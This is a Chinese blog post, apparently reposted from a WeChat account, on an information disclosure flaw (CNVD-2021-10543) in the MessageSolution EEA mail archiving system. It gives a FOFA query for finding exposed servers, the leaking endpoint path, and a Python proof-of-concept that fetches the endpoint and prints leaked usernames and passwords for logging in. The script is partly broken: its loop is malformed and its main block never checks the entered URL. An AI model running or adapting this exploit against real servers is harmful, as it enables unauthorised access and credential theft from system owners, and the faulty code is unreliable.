故事背景
MessageSolution,EEA是北京易讯思达科技开发有限公司开发的一款邮件归档系统。该系统存在0day WEB信息泄漏,泄露Windows服务器administrator hash与web账号密码
复现
FOFA大法
title="MessageSolution"
页面展示
漏洞地址如下
http://ip/authenticationserverservlet/
使用获得到的密码可以登录系统
利用POC
# CNVD-2021-10543
# MessageSolution 信息泄露漏洞
# fofa: title="MessageSolution"
import requests
import time
import json
from bs4 import BeautifulSoup
# 无视SSL证书提醒
requests.packages.urllib3.disable_warnings()
def xs():
print("+-------------------------------------------------+")
print("+----------- CNVD-2021-10543 ----------------+")
print("+----------- MessageSolution信息泄漏 --------------+")
print('+--------- Fofa: title="MessageSolution" ---------+')
print("+--------使用方法python3 CNVD-2021-10543.py -------+")
print("+-------------------------------------------------+")
def get_url(url):
get_url = url + "/authenticationserverservlet/"
login_url = url + "/indexcommon.jsp"
# verify = False 忽略SSL证书校验
try:
res = requests.get(url=get_url, verify=False,timeout=5)
if "administrator" in res.text and res.status_code == 200:
print(f"[!] 33[31m目标系统: {url} 有信息泄漏33[0m")
time.sleep(1)
print("[!] 33[31m正在获取目标敏感信息.........33[0m")
bs_xml = BeautifulSoup(res.text,features="html.parser")
user_names = bs_xml.findAll('username')
passwords = bs_xml.findAll('password')
i = 1
print(f"[!] 33[31m获取到目标系统信息:33[0m")
if i < len(user_names):
for user_name,password in user_names,passwords:
print(f" 账号: {user_name.text} 密 码: {password.text}")
i = i+1
else:
print(f" 账号: {user_names[0].text}n 密 码: {passwords[0].text}")
print(f"33[32m[0] 请访问: {login_url} 进行登录!")
else:
print(f"[0] 33[32m目标: {url} 不存在信息泄33[0m")
except Exception as e:
print(f"[!] 目标系统: {url} 出现意外错误:n {e}")
if __name__ == "__main__":xs()
url = str(input("[0] 请输入目标站点URL:"))
原文始发于微信公众号(深夜笔记本):MessageSolution,信息泄露漏洞(CNVD-2021-10543)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论